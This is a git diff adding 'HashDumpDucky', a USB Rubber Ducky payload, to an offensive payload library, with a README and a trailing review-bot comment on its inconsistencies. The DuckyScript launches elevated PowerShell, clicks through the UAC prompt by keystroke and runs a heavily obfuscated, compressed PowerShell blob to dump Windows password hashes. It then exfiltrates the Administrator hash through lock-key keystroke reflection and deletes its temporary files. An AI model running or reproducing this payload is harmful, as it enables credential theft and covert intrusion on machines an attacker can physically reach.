diff --git a/payloads/library/exfiltration/HashDumpDucky/README.md b/payloads/library/exfiltration/HashDumpDucky/README.md
new file mode 100644
index 0000000..b99a013
--- /dev/null
+++ b/payloads/library/exfiltration/HashDumpDucky/README.md
@@ -0,0 +1,22 @@
+**Title: HashDumpDucky**
+

Author: 0iphor13
+OS: Windows
+Requirements: DuckyScript 3.0
+Version: 1.0

+
+:bangbang: | This is just meant to be a PoC, as this method of Hashdump will result in empty, default hashes on recent versions of Windows.
+
+**Instruction:**
+
+Bring some time... This payload will run an obfuscated script to dump user hashes and exfiltrate the Administrator hash via Keystroke Reflection Method.
+
+#
+**Instruction:**
+
+Compile this payload with payloadstudio, place it inside of your Ducky as inject.bin and you are good to go
+#
+Exfiltrate the out.txt file and try to crack the hashes.
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/tree/master/payloads/library/credentials/HashDumpDucky/hash.png)
+
+*props to Nikhil Mittal*
\ No newline at end of file
diff --git a/payloads/library/exfiltration/HashDumpDucky/hash.png b/payloads/library/exfiltration/HashDumpDucky/hash.png
new file mode 100644
index 0000000..7ec52f5
Binary files /dev/null and b/payloads/library/exfiltration/HashDumpDucky/hash.png differ
diff --git a/payloads/library/exfiltration/HashDumpDucky/payload.txt b/payloads/library/exfiltration/HashDumpDucky/payload.txt
new file mode 100644
index 0000000..f6e8156
--- /dev/null
+++ b/payloads/library/exfiltration/HashDumpDucky/payload.txt
@@ -0,0 +1,36 @@ +REM HashDumpDucky +REM Version 1.0 +REM OS: Windows +REM Author: 0iphor13 +REM Requirements: RubberDucky mk2/DuckyScript 3.0 + +REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection. + +ATTACKMODE HID +LED_OFF +DELAY 2000 +SAVE_HOST_KEYBOARD_LOCK_STATE +$_EXFIL_MODE_ENABLED = TRUE +$_EXFIL_LEDS_ENABLED = TRUE + +REM Dump the user hashes and filter for the Administrator hash +GUI r +DELAY 1000 +STRINGLN powershell Start-Process powershell -Verb runAs +DELAY 1000 +REM Shortcut for pressing yes on the UAC pop-up - for english keyboard layout use "ALT y" +ALT j +DELAY 1000 +STRING & ( $vERBOSePrefeRENCE.tOStrING()[1,3]+'X'-JoiN'') (( [ReGEX]::mATcHES( "NoISSErPXe-EKoVnI| )63]rAhc[,93]rAhc[ f-)' )(dnEOTDAer.))Iic'+'sA::]gniDoCnE.TXet.mETsyS['+' , ) )sSERPMOcED::]eDOmnOisSERpMoC.nOISsERPMoc.OI[,) }0{=Mg/dBFIZtFbQsuDc'+'iWdwqfq+j'+'TifWYWVkvIY1ZglTlFbaaSbaHuWEOzKyPlif'+'1ySGkmnV7lP/pfAfp1CLtBTP6VcBvuTQyCp4g8ssbFhONWOd3Ol73MheJJFBggxaaBofxzHzWFIy/dcCJ3dU4wZ+G+kk1uK/uyeB'+'7ThEx1ZQwV9wQfEm6fBHHuHi7wc4lVJWSxByZX1H0fya5WFswzM08o9eej+CP/3fKpWBwsmVyfpbbCeGJ'+'fi'+'m/xvrl'+'qb06zQMeSh3P+PVo'+'UFyHtfNhzDwAbvNLYEP'+'/VZRxbEnEAQ6Hxf/LFbYwkE/9bpiMc7Ih8+DkF3h2dLfdxGxMuHwWKyHmwKT9i2fAs8L/Sdkc+rF/c+UC+uVg6//22rhH'+'4GKB+ZSnS8PE'+'yXtbsdTRxAxtGDggf'+'6c4+AseZ4/v9k71//sRRzo1hkatyDmImrPtMXrOK8j9QP7gvabYjaWzbmNgt7nVF2nPjFwU0W7ZL3miFrdtB42Ub6Y30U4iFkez7vzuPgNAAr/N798acla'+'A/kayIwTeKxb2nUEuSI8uI'+'ef5ciCk3UVqgldjgCBjuEvLoIPdLaWEh2d83sv69oMnANzdAvUDoWAyYSCN'+'GkDq0K0mo3L863'+'6+hYZlxv58K'+'ekvjaqRKL+r9UNg+CNPbjDI'+'8EEQ8X4RhvVRqp9+xwES+99Qxj'+'XCs++eiDOmJqb/F'+'F0Ul53WgVRJs2ygs2HX2vH6ylG+HFTaQjL3D77+Ta2dqWP8gaZdM+XzYea'+'jV2G20fj9CG64Xtx'+'TvSLCJW81PCGWfngA9Pu8Sr/4wc7MdNopCXW'+'sC8tPZ6Tv'+'CuK5W69IS9BY'+'mnud75Y9M3LD9B2'+'N8+AHxPK'+'0bexx'+'VpQ2TTgV8l6My3IFRrnfqOQR'+'L0dxm4cW11b6Dr8K96EUtOq2iiK70eRVIIoA+WrzBIhRs5FIkaF7UR/616e7X7IXu8oJi601TXQp8cVAg2'+'5zdQRCHMFhMAamFtZ5WNYzaoUHXa1Jnb2aMG'+'4LXZZnzMjLq9PdlkxXcK8bDFcwKwwKl6das
C7jjY2NflfmSBGkWw9kmcY8KyeV3gDZeENCkOX5f2t4TemRW0'+'O8K2cek/qRX8ticj1MyuYiCIyWF+DF/hMnaCl+X/yu5'+'s163DPu1'+'xg6/F0ukzONsrISvivKGtWkVwNqgWV2JQBKx9+'+'uFyrbVCuoKYxEO3TDqRWj1HMl73bnk8x1xJSWp5'+'b'+'/Oq'+'bkNbaYBHKXmJFfeX2X3oAs'+'SB3WQ'+'cYJzfcyIetnB17QUrd9AhE'+'Fadov2i39ui1renPC+IZ9KDRy3T6iH2wJ1aPnRTfmHCbZcFwpYswWQpN'+'VAfTS9Xf'+'bttx9D+uxlJjTvupkY8HP9mTL+kO4TK6Q9ieEoPAYX'+'183UHAzRy2emkrRVtSsb8BeX'+'2vadQBIXFsRMVAg/NVK8fCqmgDvP97/Wwk'+'cbReDVO25WS0XRxhczhN8trF'+'bg9D2TbmEVcINVBwvireEo'+'6jWiHMpwed0x3+FJH/JOf1q22p8HOx9trgsf7m7ef'+'03'+'/Fxdo6A3eq0X2'+'zQ+320P4mWtcxS'+'1VIzirtITRDYZddAzuQ/Yuu0xpIVUPTER4'+'cK0MD2hPFtwxsxPhbatrYsnapQrWO1C+744LFxKr0/DJoBfsIXuqTWTaJv'+'5YpZMlCeaNSc9EU0fmUO74KIGzpNBVlEdJLKN'+'xIZS44gO'+'e+LTB9Jo'+'gwj+4/rWlQzF2z0q1EkUm0JSPfR9HXfrTtCT31Ia6q38gS3Fsbm+9r7Pv/oyowvp+wm15Of7XwLv72/HfjqCK/864//dyff9l1vsfPJ99Ct/fymu7trXKg3chQZ7RtNG3MHr3V5BhS7wivkOVBo/GVMvyTHCg/'+'Zsp+SP2n7G2ctBB24gN6YjLb2wGTsxFbAQzGaGwGLsxBvNd6Oc75WJTgGjRjODKO7+q9+Fhab4Dpj+eKasxmF9kgU7XQs+lNi/Rl8FTqJZ8e6'+'F+KX8ZOuSCM24H6fOmsvq6MzeTqhKPtxzo7P2zfcJ59R+HCloIJFALy7jLP56j/OqGfqZ'+'ayAhbobz5h8Iange69zvOvIpWxMrRjf54Kpcb/CwLC9V/9'+'Hs5ZqX+Y2a'+'1dfAIOyuldJdFfHyQ2T'+'FnbD4SNeo5A'+'anhVUgDpKRuDDOvQtl1S2m3az6Fmhxupbj2nSMoj72JP3WzoYElqZkU63iJuK0vGU2'+'aMNzz7tp2KRNbH+Fa1vkRjBOePjOd'+'zmfHtsU0'+'03vV5tgkxPi51kdpEAbIuSXmaWGUnmMfSF9'+'H3mAEBcC0U1TjTsIDXnkZrav/RJ8kwoggTAK7ZG+ZAvMdHnBzIO+mVbkmgSt2eQe1AVME7'+'fXx3fvrPapQWd0jt'+'sC24XQ593yL024GZm8Y'+'7+bSiRGszaKovH7YDP5qL2SHd31W/alE350wFttaC6llA/bPx+utmkNa'+'LNxMNCXkMcR47jeekyEezVoLeRApRZLeU45wtPL4z2IS/qgIJHSrr'+'ksxcnMdnYy7zZAGvR1'+'Unm'+'CWvRFXMBF6J3ZFaBE6UAI'+'vs0ehSv/Y'+'heOZgxskiyP7BGlJ+QfhKsf'+'G5MNJv'+'2rkpAjwvGBwEcB2'+'v9c30P4zYf'+'922FZzBqfg5D2rM89nNCJzVtgOAmFx8+Vx/l7lsmxmH3Vlu6YA9VSHt'+'YhnK/AXhBxs2V5UJA2e4S1shm/HtHo'+'ed6Vn9NrxdFnw47NJEhnKMSG+JHzzcich'+'NJlqWD2SGdApJUcAvnROYLiY8OBn9KtkBzylCw5ALneVj+APBldEhX1WE/xZ7RsL3Honwej8EBUY3qOc7wcTZvOPdRLvkiE8Jn/qDwuIBpn3GyS'+'1GrGYLF6F'+'azND9WDKSe+shX6gs+zMsb0TPWL3e1bk3QYOQY/uSKvJOLiOxVFxXuzqrBPLnYI
'+'5yJce76Thz0Sj+y55M+XusVFtsp3Um8BtJ9lMKtZdTSlpyizsPRy66scOPVMbeEBlpTGwC5Jx'+'PH'+'iKC7NnC/Zgsg3tMrMW2O'+'54LKP58qJYHFEdVo5peQENSTt/3u2CDv7/igbFh/MofBI5O7jZkpzhN/lJ2jl'+'xH9F10nwPpf0'+'gi'+'rjRGt'+'H1q7l9FNULrtPK/5DJ/zDVeYKhMxrMVUC4LuSBhCCt4bqgLy5XzUQ7PpTeGx+I0XrLoEPGvaDTwzkx5tpZJhbVCuLe'+'KmKO'+'uiZbFYlbg1dHyO3'+'dJvTF7XFyR3wJbp7JCEUonN9wlj/tk7DurgKC2fS0xfS0xfg4HQ35cMOX6BEBq4QPiPz61wCnj4lsOFKZ'+'bKoT9NqdDFITbNIG2Aw6'+'SuP'+'QlC2JB78'+'kEHK4tvy05Xwm'+'I43x'+'uvg'+'xkfKM'+'OH9NjZHK5kTYBF4oEU3kOg5c05FhPaOp7FHealLsmAhVUe5NACbSSA/LlAa7CaI6MKB1'+'r+NRR+PWzj2iXfcHlSOGGYei7IZiW0Mh5mgheLJJmxqgr7muf4Zz+P0bD6f2I8PsE'+'MhljhMvkWaZltXMK/SLBps'+'HdFWOHFg'+'/VwYmk8KSdy'+'TsLuOVv8Xft4/kdvrW2J'+'H9YrLbdYjFXCSMuAkYcBIx3GciyNKE/mWbp5NnpSo5AZR+JpX2IS'+'jg'+'lTdFoisKMJI5qvQLUbwRdie5Df6ZqL3pH5iV5UmO4hc+MyFWFvG9lTx5gYaOlhV5rX3oTYCOuhKf'+'IgieCiAZWkFke1LHYGzgVlCB0UMKYS6FFxyoU0qRhMjoS4tasa0E4SVtQDWVVH'+'UY5jZiML56wUK1zM1uah0PItJW'+'xrMdQdo68JMwZtzKHbHLbNn5dlr2CC25zqVcwdRwGGvZVbdO'+'k4eS0FuJbaPoRNlUFMBZRWhKUqaq4a5UqADKYTpiqdPCYjJ2YgN6sL5yIXmZQq7x0f7W9yQ9'+'qD/AQONQ6rP9l1bJmRf'+'dYm+26CYXBH9lFQCq'+'Ub4tO14HUfd0O2NNJi7HT+4Sd3JDIzlDMbdp9Fgy5jm54dnWuuHHKqrnsge4UYOnxjXhHaCDHBDD6jD9xFWwD'+'KBxHQJFGkDdxFWyHqBmwgx4QT88BUeBmwBag98oPekFcgZMkAkU'+'vZtheAUpRP8oTawIY'+'yAKMIH6iHcimOgyIUEMMofO0BH6'+'gHMimGAgDLBzHQJFYJXYO7ph9xhe4AL4C/I0dZuC9xhe4QH'+'ch5sjG2HH6mis'+'FcIlUgZclOoPO2DHYJHYEPFAPgNG5F0RjuoDMgheglB9xhe4Q'+'n8o0ZEdUsGoAP2jHZBHYGnp6Sh+o0NAih'+'MFYJXYOHoh9xhe4A'+'L4CHJw6'+'zSgAN2lHZBHYG3phC4xeo4RCgusFYAHqjOYxs8oHekBcgG6MCJLsE4RjuoDMkj0B/5Re4YHU4GhCjMEQA8MoXe'+'0DP6gOQHMgBTy3GGKoAL5D3Zd/90t0v3fF9K61gPSb7grmlokodpa0fA9YvzOLttnwTH054lHz6i8oJDLiuu3jA/1kMHOQvLLOaa0K1tod9rY8JNEYr2PdshCwb3YBZmZEe9W1eTbtq9'+'KfZPYIzw3cyJ/JIO'+'/v7snNnvKPU1Qa9J+q7u+9rBO513e4JdkE0R0c7cGZH+oLRtH65Chgnk8'+'LWq9nDGYvyjXfQ2KkciYj8gaK7w9mJ0P+HiyuO4V/L5M67t'+'f/PJG+dYj4ub'+'m8jp5BkHiZF'+'SyYpCZZ4BV87a1HbH'+'nV+2oKgykT6I3mjdKC+tvCaOsPzNMkF29bD'+'BpbSeKfmsoMtb8XhNGfh+NZfDf9rVg'+'n7GyR0lumNz7m3mJcrZ8Dev/LFwjDpLJ28t4H94/ylChWqRD2mv'+
'Io96Qx3lybWw+rbbjzot9P39sZr19oMSuRFUZP0yGqE+JTAH8HniHV53zY+EhTC36izhL1MEtOVDP5BXBO+4luy4d1I4eoAmjCH+tw8v'+'Nn'+'KbQ6lxd0lEBdyOplJxpfZb0oZzQMbxe+OC1tvplQelWWV7QMdEjtmHSC'+'nkxVDqBYQWk/od'+'TBKrSwsuVPfP27'+'7GTe8soEpX4'+'EpJyicbiDCjHu7k950t'+'/x0xIahI'+'U7MqkeJ8+PBfHlJlK8uxgswgQMnw0'+'DrRRrJt'+'JP'+'lxYAyHRGj'+'JkZ5+'+'zQGoT41ZiG'+'VicPJhEttJySykOjCBNA5vZ9u9k7'+'Cp3JUzuNjsr2/HBMqC6FJZQ3dmF2NnbJ2ZcH/WolSz5+ambdxOuCYeywUzurfbOzMXlbaIpH3eqyrUa'+'jt443JkLSrYMGbeYoR9EqBPwHLBH0pDJ7eejjOITSKvs+BBWSvp1FxQ'+'q0EGsu'+'gP5F4OZHv9nhBSkU00w'+'7vvJLs9KH+hX4yHeGbkxOpeqtvJ3jz0CVvf2GB57zXDZHjRfpq8EuT2VazKhi7eji4kI9tZvpxnl9bkem12o'+'/QQui/vf41b7wdfbPoDQCH/JC82n8'+'81Vfv'+'xBiIZI/OIoRyT4'+'GThT59V264NRsLlI9266SdCz2nX'+'HDueSiwzg90T39Ej+gx4byvedXd1U2ZHEAC8M9ct7+z3+SAItIQUWYEy0iWp1JvsPnMmevzmtqUqdedplSaTGsTL43pcq78vEIt5c7tV7}0{(GNIRTS46EsaBmoRf::]tREvNOC.mEtsyS[]'+'MaERTs'+'YrOMEm.oI[(mAe'+'RtSeTAlFed.noiSSERpMoC.Oi tcEJBo-wEn ( (REDAerMAertS.oi '+' tcEJBo-wEn()}0{X}0{+]31[DILLEHs}1{+]1[DillEHs}1{ (. '((",'.' ,'RIGHTtO'+'LeF'+'T')-JoIN '' )) > output.txt;cat output.txt | Select-String Admin > admin.txt;rm output.txt; +DELAY 500 +REM Exfiltrate the Admin hash via Keystroke Reflection +STRING foreach($b in $(cat admin.txt -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}';echo $o >admin.txt; +DELAY 500 +STRINGLN $o=(cat admin.txt);Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o);rm admin.txt;clear;echo "Administrator hashes exfiltrated!";Start-Sleep -s 3;exit +DELAY 1000 + +REM The final SCROLLLOCK keystroke indicates EXFIL is complete. +WAIT_FOR_SCROLL_CHANGE +LED_G +$_EXFIL_MODE_ENABLED = FALSE +RESTORE_HOST_KEYBOARD_LOCK_STATE \ No newline at end of file
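Review bot: The header REM block of payload.txt (the first seven lines of the hunk) omits the limitation the README states up front — that this method yields empty or default hashes on recent Windows versions — while the closing STRINGLN prints "Administrator hashes exfiltrated!" unconditionally, so the payload's own output contradicts its documentation. A line after `REM PoC of dumping hashes, filtering for the Administrator hash and exfiltration via keystroke reflection.` such as `REM NOTE: on current Windows versions this dump returns empty/default hashes (see README); the final success message is printed regardless of result.` would keep the two in step. The file names also diverge: the README tells the reader to exfiltrate `out.txt`, but the script writes `output.txt` and `admin.txt` and removes both (`rm output.txt;` and `rm admin.txt;`) before `exit`, so no such file is left behind. From a detection standpoint the same REM block should record the host-side artifacts the chain produces — an elevated PowerShell started from the Run dialog via `Start-Process powershell -Verb runAs` and the transient `output.txt`/`admin.txt` in the working directory — since those are what a reviewer validating this PoC would look for.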